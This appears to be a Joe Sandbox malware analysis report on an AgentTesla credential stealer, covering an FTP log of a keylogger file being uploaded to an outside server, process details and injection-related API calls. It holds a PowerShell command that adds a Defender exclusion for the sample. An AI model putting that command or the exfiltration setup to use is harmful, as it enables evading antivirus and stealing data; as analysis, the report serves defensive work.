Jan 11, 2025 08:35:33.176716089 CET	21	49735	192.254.225.136	192.168.2.4	227 Entering Passive Mode (192,254,225,136,123,67)
Jan 11, 2025 08:35:33.182332039 CET	49735	21	192.168.2.4	192.254.225.136	STOR KL_user-910646_2025_01_26_20_34_39.html
Jan 11, 2025 08:35:33.820887089 CET	21	49735	192.254.225.136	192.168.2.4	150 Accepted data connection
Jan 11, 2025 08:35:33.969130039 CET	21	49735	192.254.225.136	192.168.2.4	226-File successfully transferred 226-File successfully transferred226 0.167 seconds (measured here), 1.65 Kbytes per second

Target ID:	0
Start time:	02:33:50
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\dhPWt112uC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dhPWt112uC.exe"
Imagebase:	0x280000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000000.00000002.1779513713.00000000037E4000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	2
Start time:	02:33:57
Start date:	11/01/2025
Path:	C:\Windows\SysWOW64\WindowsPowerShell\v1.0\powershell.exe
Wow64 process (32bit):	true
Commandline:	"C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe" Add-MpPreference -ExclusionPath "C:\Users\user\Desktop\dhPWt112uC.exe"
Imagebase:	0xdc0000
File size:	433'152 bytes
MD5 hash:	C32CA4ACFCC635EC1EA6ED8A34DF5FAC
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	3
Start time:	02:33:57
Start date:	11/01/2025
Path:	C:\Windows\System32\conhost.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\conhost.exe 0xffffffff -ForceV1
Imagebase:	0x7ff7699e0000
File size:	862'208 bytes
MD5 hash:	0D698AF330FD17BEE3BF90011D49251D
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	4
Start time:	02:33:57
Start date:	11/01/2025
Path:	C:\Users\user\Desktop\dhPWt112uC.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\Desktop\dhPWt112uC.exe"
Imagebase:	0xed0000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	true
Has administrator privileges:	true
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4168329440.000000000344C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000004.00000002.4168329440.0000000003421000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Target ID:	5
Start time:	02:33:59
Start date:	11/01/2025
Path:	C:\Windows\System32\wbem\WmiPrvSE.exe
Wow64 process (32bit):	false
Commandline:	C:\Windows\system32\wbem\wmiprvse.exe -secured -Embedding
Imagebase:	0x7ff693ab0000
File size:	496'640 bytes
MD5 hash:	60FF40CFD7FB8FE41EE4FE9AE5FE1C51
Has elevated privileges:	true
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	high
Has exited:	true

Show Windows behavior

Target ID:	7
Start time:	02:34:08
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x660000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 00000007.00000002.1954874837.0000000003B65000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Antivirus matches:	Detection: 100%, Avira Detection: 100%, Joe Sandbox ML Detection: 75%, ReversingLabs
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	10
Start time:	02:34:13
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0xe50000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2008765342.0000000003261000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2000218775.0000000000402000.00000040.00000400.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000A.00000002.2008765342.000000000328C000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	11
Start time:	02:34:16
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0xce0000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2032655165.0000000004271000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000B.00000002.2032655165.00000000042F2000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	12
Start time:	02:34:21
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x440000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	13
Start time:	02:34:21
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x210000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	14
Start time:	02:34:21
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	false
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0xa0000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Reputation:	low
Has exited:	true

Show Windows behavior

Target ID:	15
Start time:	02:34:21
Start date:	11/01/2025
Path:	C:\Users\user\AppData\Roaming\newapp\newapp.exe
Wow64 process (32bit):	true
Commandline:	"C:\Users\user\AppData\Roaming\newapp\newapp.exe"
Imagebase:	0x910000
File size:	889'344 bytes
MD5 hash:	2327E5C20B3CCE0BE582DBE461480CC2
Has elevated privileges:	false
Has administrator privileges:	false
Programmed in:	C, C++ or other language
Yara matches:	Rule: JoeSecurity_CredentialStealer, Description: Yara detected Credential Stealer, Source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4167926761.0000000002CC1000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security Rule: JoeSecurity_AgentTesla_1, Description: Yara detected AgentTesla, Source: 0000000F.00000002.4167926761.0000000002CEC000.00000004.00000800.00020000.00000000.sdmp, Author: Joe Security
Reputation:	low
Has exited:	false

Show Windows behavior

Execution Graph

Execution Coverage:	10.8%
Dynamic/Decrypted Code Coverage:	100%
Signature Coverage:	2.3%
Total number of Nodes:	305
Total number of Limit Nodes:	15

Executed Functions

Function 04BF6698 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1d8a9d17ba50fef0941e8deadc56a7dd78af017144b26a920d258c555b1dc591
Instruction ID: f5d738f1b8a5e86e599b31d2a8132555927507e6ddd7f70fac5c0db3450153ed
Opcode Fuzzy Hash: 1d8a9d17ba50fef0941e8deadc56a7dd78af017144b26a920d258c555b1dc591
Instruction Fuzzy Hash: 0932A634E11219CFDB14DFA4C894A9DB7B2FF8A304F1185AAD909AB365DB30AD85CF50

Function 04BF6688 Relevance: .5, Instructions: 483COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 2cb77e249c1482e9609f643c01aed8e98dcd1490d3ae838b0f1a2381e87da728
Instruction ID: c97b17d40867dad30645b53358214160355b25f1b65cbdaaff67cdc106b0ae08
Opcode Fuzzy Hash: 2cb77e249c1482e9609f643c01aed8e98dcd1490d3ae838b0f1a2381e87da728
Instruction Fuzzy Hash: C032B534E50219CFDB14DFA4C894A9DB7B2FF8A304F1185AAD909AB365DB30AD85CF50

Function 06ABD82C Relevance: .0, Instructions: 8COMMON

Download Yara Rule

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID:
String ID:
API String ID:
Opcode ID: 1c9ef92985234ae14521dbe4665897c998c53ba068ed1c3a5e2a78f64b47877b
Instruction ID: 64e05393c0753d974fc253a9c1458a43059025c19f84f94703077e315957e270
Opcode Fuzzy Hash: 1c9ef92985234ae14521dbe4665897c998c53ba068ed1c3a5e2a78f64b47877b
Instruction Fuzzy Hash: EAA00230CDE21588A2C13C1005618F5D4BD175B090F817002442F330135840D00008DD

Function 00B7D468 Relevance: 6.1, APIs: 4, Instructions: 132
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B7D4F6
GetCurrentThread.KERNEL32 ref: 00B7D533
GetCurrentProcess.KERNEL32 ref: 00B7D570
GetCurrentThreadId.KERNEL32 ref: 00B7D5C9

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 238d431d0436177f3e6212c9ef30b6831d318db77eca89212c9682a282ec1b91
Instruction ID: 513200c16a2e969f5fc74e9e7ff0da940cfa8c0f0254f94dfc599785bc1a8d0c
Opcode Fuzzy Hash: 238d431d0436177f3e6212c9ef30b6831d318db77eca89212c9682a282ec1b91
Instruction Fuzzy Hash: 3C5144B0D012498FDB14CFAAD548BDEBBF1AF88318F24C499D419A73A0D735A984CF65

Function 00B7D478 Relevance: 6.1, APIs: 4, Instructions: 128
threadCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetCurrentProcess.KERNEL32 ref: 00B7D4F6
GetCurrentThread.KERNEL32 ref: 00B7D533
GetCurrentProcess.KERNEL32 ref: 00B7D570
GetCurrentThreadId.KERNEL32 ref: 00B7D5C9

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: Current$ProcessThread
String ID:
API String ID: 2063062207-0
Opcode ID: 5bf3ac7a99321039399535c417cebc569e55d3f5f06a966b90fbb539374463a7
Instruction ID: 7fe0423d72f3cf354b4270a8784baa9b9612e6b690b6b9b4f067906c84bb4638
Opcode Fuzzy Hash: 5bf3ac7a99321039399535c417cebc569e55d3f5f06a966b90fbb539374463a7
Instruction Fuzzy Hash: 035144B0D012098FDB04DFAAD548B9EBBF1EF48314F24C499E019A7360D774A984CF65

Function 06ABB925 Relevance: 1.7, APIs: 1, Instructions: 249
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABBB66

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 7710f5b18dcaef788ac775de2233d955b5e5d6ffeb70d63884d1b08f148179a8
Instruction ID: 29f1c96fb1d52146cb04d6b49b0072656046adbdc96a5b8943a8ff8504376503
Opcode Fuzzy Hash: 7710f5b18dcaef788ac775de2233d955b5e5d6ffeb70d63884d1b08f148179a8
Instruction Fuzzy Hash: B5A19A70D00219DFDB64DF69CC41BEEBBB6BF48310F0485A9E818A7251DB749985CFA2

Function 06ABB930 Relevance: 1.7, APIs: 1, Instructions: 243
processCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateProcessA.KERNELBASE(?,?,?,?,?,?,?,?,?,?), ref: 06ABBB66

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: CreateProcess
String ID:
API String ID: 963392458-0
Opcode ID: 2405179ed88ae1ab0f1eda6e16208ea97d0654cd26e1ec5db331196a3b57d4ea
Instruction ID: db622c9b1ac53dd50a8da0a007981f857bed886ead9e0619bbefbdee00d1f976
Opcode Fuzzy Hash: 2405179ed88ae1ab0f1eda6e16208ea97d0654cd26e1ec5db331196a3b57d4ea
Instruction Fuzzy Hash: 9F919B71D00219DFDB60DF69CC41BEEBBB6BF48310F0485A9E808A7251DB749985CFA1

Function 00B7ADE8 Relevance: 1.7, APIs: 1, Instructions: 196
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

GetModuleHandleW.KERNELBASE(00000000), ref: 00B7B03E

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: HandleModule
String ID:
API String ID: 4139908857-0
Opcode ID: 3490107495c86b47eed6302187b38360725f721bc045d64f776b269b5b5c2313
Instruction ID: 91ca6c1c98a9f1facdcef9d0fc9afe215dab4bb403fb2c0b2667f73dac09c23a
Opcode Fuzzy Hash: 3490107495c86b47eed6302187b38360725f721bc045d64f776b269b5b5c2313
Instruction Fuzzy Hash: 61715470A00B058FD764DF29D05179ABBF1FF88300F10896DE0AADBA50DB34E949CB91

Function 04BF18E4 Relevance: 1.6, APIs: 1, Instructions: 119
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BF1A02

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: 8342567e0bedf2be95c3704c92fd06a4b2800811ca1f1807e5072b832b1c230b
Instruction ID: abbb4b9593dea760b016a131727b44ed1f52e40b98b92d5b426f0610173d0e6e
Opcode Fuzzy Hash: 8342567e0bedf2be95c3704c92fd06a4b2800811ca1f1807e5072b832b1c230b
Instruction Fuzzy Hash: 8151E2B5C00349DFDB14CFA9C884ADDBBB1FF48310F24856AE418AB210D774A846CF91

Function 04BF18F0 Relevance: 1.6, APIs: 1, Instructions: 113
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateWindowExW.USER32(?,?,?,?,?,?,0000000C,?,?,?,?,?), ref: 04BF1A02

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID: CreateWindow
String ID:
API String ID: 716092398-0
Opcode ID: b572e536b4c2e40801baeac185e19b96584de2fae7307499878df4ca574649e8
Instruction ID: 0bcd77a4789d98ebf86b21ed01ea49fef6296fc525f6794bf7b9d6ca7af304c5
Opcode Fuzzy Hash: b572e536b4c2e40801baeac185e19b96584de2fae7307499878df4ca574649e8
Instruction Fuzzy Hash: 5741D2B5D00309DFDB14CF99C884ADEBBB5FF48314F24866AE418AB210D775A945CF91

Function 00B744B4 Relevance: 1.6, APIs: 1, Instructions: 96
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B759C9

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 77a5f920e69a0c9bf45eed910163104454f05b5767277e5e764f63408e138de9
Instruction ID: 19aeb3572d17f0a7bd0d9e2ff915e5d171cc55890278ff0fcf8b4b24651591e4
Opcode Fuzzy Hash: 77a5f920e69a0c9bf45eed910163104454f05b5767277e5e764f63408e138de9
Instruction Fuzzy Hash: CE41D2B4C00619CBDB24CFA9C884A9EBBF5BF48304F2481AAD419AB255DBB56945CF90

Function 00B7590C Relevance: 1.6, APIs: 1, Instructions: 95
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CreateActCtxA.KERNEL32(?), ref: 00B759C9

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: Create
String ID:
API String ID: 2289755597-0
Opcode ID: 1064ddeed7b16178b20f3d80b1e2a7797174564116f76a71582879bdeeb5f9ba
Instruction ID: 3c4484926825c82c2d0a7cd4bdf1f19773ed1ad499e9ddc6b6b23b9203e94b20
Opcode Fuzzy Hash: 1064ddeed7b16178b20f3d80b1e2a7797174564116f76a71582879bdeeb5f9ba
Instruction Fuzzy Hash: 0841F2B4C00719CEDB24CFA9C8847CDBBF5BF48304F2480AAD418AB255DBB56946CF90

Function 04BF4050 Relevance: 1.6, APIs: 1, Instructions: 93
COMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

CallWindowProcW.USER32(?,?,?,?,?), ref: 04BF4111

Memory Dump Source

Source File: 00000000.00000002.1782467142.0000000004BF0000.00000040.00000800.00020000.00000000.sdmp, Offset: 04BF0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_4bf0000_dhPWt112uC.jbxd

Similarity

API ID: CallProcWindow
String ID:
API String ID: 2714655100-0
Opcode ID: 726effb178d168c59968a461410d6820ac333c6d3304fccc055498fa86f4a0c6
Instruction ID: 9bafcfc764bc14ac92a0c2902d4df1112d4cf7a58523917b0ea8c50bc0c93f22
Opcode Fuzzy Hash: 726effb178d168c59968a461410d6820ac333c6d3304fccc055498fa86f4a0c6
Instruction Fuzzy Hash: BF4115B9A003058FCB14CF99C848AABBBF5FB98314F24C499D519AB321D774A945CFA0

Function 06ABB6A0 Relevance: 1.6, APIs: 1, Instructions: 72
injectionCOMMON

Download Yara Rule

Control-flow Graph

Executed
Not Executed

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABB738

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 8f7a14a6c96171336763665449a126bd2778323436e1061ba69c60c4512397a6
Instruction ID: dec2cc6b8df56c553adfd7911dbcbc36c7aed09eab1a8b67ef2b806adcbcbfb7
Opcode Fuzzy Hash: 8f7a14a6c96171336763665449a126bd2778323436e1061ba69c60c4512397a6
Instruction Fuzzy Hash: 912189B59013499FCB10DFA9C885BEEBBF5FF88314F10842EE858A7241C7789944CBA0

Function 06ABB6A8 Relevance: 1.6, APIs: 1, Instructions: 69injectionCOMMON

Download Yara Rule

APIs

WriteProcessMemory.KERNELBASE(?,?,00000000,?,?), ref: 06ABB738

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MemoryProcessWrite
String ID:
API String ID: 3559483778-0
Opcode ID: 4f4727ed4a480cfe317e9f7f71c072a06fdd18832230c9122c4bb744b072125d
Instruction ID: 7273d2f1068028db2412aac6b424f9a9082b6b59c9019b4b4a06392923554145
Opcode Fuzzy Hash: 4f4727ed4a480cfe317e9f7f71c072a06fdd18832230c9122c4bb744b072125d
Instruction Fuzzy Hash: A32136B59003599FCB10DFA9C885BDEBBF5FF48324F10842AE958A7251C7789984CBA4

Function 06ABB0D0 Relevance: 1.6, APIs: 1, Instructions: 69threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABB156

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: 345a02b1143d8a23cce442269613f680b04855a78a9ab5ca29cf3af70b9d1681
Instruction ID: 88638ed4d139ebf2e6dcb1f3f01c36cb1af1fccfed8e686a76177cd7e20514da
Opcode Fuzzy Hash: 345a02b1143d8a23cce442269613f680b04855a78a9ab5ca29cf3af70b9d1681
Instruction Fuzzy Hash: DC2159B5D003099FCB10DFAAC885BEEBBF8EF88314F148429D459A7241CB789945CFA5

Function 06ABB790 Relevance: 1.6, APIs: 1, Instructions: 66COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABB818

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 941c5e3da5a4c1674efdaa04147d8dea41b303c0c2047abe99fa504e327bdbe0
Instruction ID: cc493aed94978bd4dd713414bb94a8a9cca5e94d08a9d227960547acdc473054
Opcode Fuzzy Hash: 941c5e3da5a4c1674efdaa04147d8dea41b303c0c2047abe99fa504e327bdbe0
Instruction Fuzzy Hash: F92148B5C003499FCB10DFAAC841AEEFBF5FF48320F108429E959A7250C7789944CBA5

Function 06ABB798 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

ReadProcessMemory.KERNELBASE(?,?,?,?,?), ref: 06ABB818

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: MemoryProcessRead
String ID:
API String ID: 1726664587-0
Opcode ID: 5873f755c58dd0494ccd8560ddb7aca026f013522131befa4e7b9544fc774ce4
Instruction ID: d2ace660a0818102e71e862380a753bdc552e06243bb7bb3643fcfa86f46d36d
Opcode Fuzzy Hash: 5873f755c58dd0494ccd8560ddb7aca026f013522131befa4e7b9544fc774ce4
Instruction Fuzzy Hash: 452137B5C003599FCB10DFAAC881AEEFBF5FF48320F10842AE558A7250C7789944CBA5

Function 06ABB0D8 Relevance: 1.6, APIs: 1, Instructions: 63threadCOMMON

Download Yara Rule

APIs

Wow64SetThreadContext.KERNEL32(?,00000000), ref: 06ABB156

Memory Dump Source

Source File: 00000000.00000002.1786388007.0000000006AB0000.00000040.00000800.00020000.00000000.sdmp, Offset: 06AB0000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_6ab0000_dhPWt112uC.jbxd

Similarity

API ID: ContextThreadWow64
String ID:
API String ID: 983334009-0
Opcode ID: def30001c30f114986a5537cb93bf73f19fec973a4fcdcd947d55c014ebcc01b
Instruction ID: b6d59c3d9ab66060c4bc47dece1484cb194018e747a062abb29a1e02218d66cc
Opcode Fuzzy Hash: def30001c30f114986a5537cb93bf73f19fec973a4fcdcd947d55c014ebcc01b
Instruction Fuzzy Hash: F52149B5D003098FDB10DFAAC4857EEBBF4EF48324F148429D459A7241CB789944CFA5

Function 00B7D6B9 Relevance: 1.6, APIs: 1, Instructions: 63COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7D747

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: 7713c23200944c1a04cdef5992f1828de7d8e5229d17b1dba9ee2c4b01f95a35
Instruction ID: 217d08c119614c501960a0eb1f31bf48d9689e36cbfb517510cda6e03900d1cc
Opcode Fuzzy Hash: 7713c23200944c1a04cdef5992f1828de7d8e5229d17b1dba9ee2c4b01f95a35
Instruction Fuzzy Hash: 4A21E3B59002599FDB10CFAAD584AEEBFF4EB48314F14845AE968A3211C378A944CF65

Function 00B7D6C0 Relevance: 1.6, APIs: 1, Instructions: 62COMMON

Download Yara Rule

APIs

DuplicateHandle.KERNELBASE(?,?,?,?,?,?,?), ref: 00B7D747

Memory Dump Source

Source File: 00000000.00000002.1777867522.0000000000B70000.00000040.00000800.00020000.00000000.sdmp, Offset: 00B70000, based on PE: false

Joe Sandbox IDA Plugin

Snapshot File: hcaresult_0_2_b70000_dhPWt112uC.jbxd

Similarity

API ID: DuplicateHandle
String ID:
API String ID: 3793708945-0
Opcode ID: de82df8db23c51d8557e11ebddd8d162ad79d684ea034b7298fe612f6b124daa
